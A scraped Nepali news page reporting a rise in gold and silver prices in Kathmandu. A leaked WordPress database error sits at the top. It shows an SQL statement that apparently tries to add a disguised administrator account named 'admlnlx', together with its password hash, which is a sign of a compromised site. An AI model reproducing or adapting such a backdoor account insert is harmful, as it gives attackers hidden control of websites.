WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuXeumRNWvWgyhgXDgbdBOChbe5yZz.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 14:38:30', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ५ –
सुनचाँदीको भाउ बिहीबार बढेको छ । सुनको भाउ तोलामा चार सय रुपैयाँ तथा चाँदीको भाउ तोलामा पाँच रुपैयाँले बढेको नेपाल सुनचाँदी व्यवसायी महासंघले जनाएको छ ।
महासंघका अनुसार सुन बिहीबार तोलाको ५५ हजार ६ सय रुपैयाँ पुगेको छ । बुधबार ५५ हजार २ सय रुपैयाँमा कारोबार भएको सुनको भाउ तोलामा चार सय रुपैयाँ बढेको हो ।
यस्तै गएको आइतबारदेखि नै स्थिर रहेको चाँदीको भाउ पनि तोलामा पाँच रुपैयाँले बढेर ८ सय २५ रुपैयाँमा किनबेच भइरहेको छ ।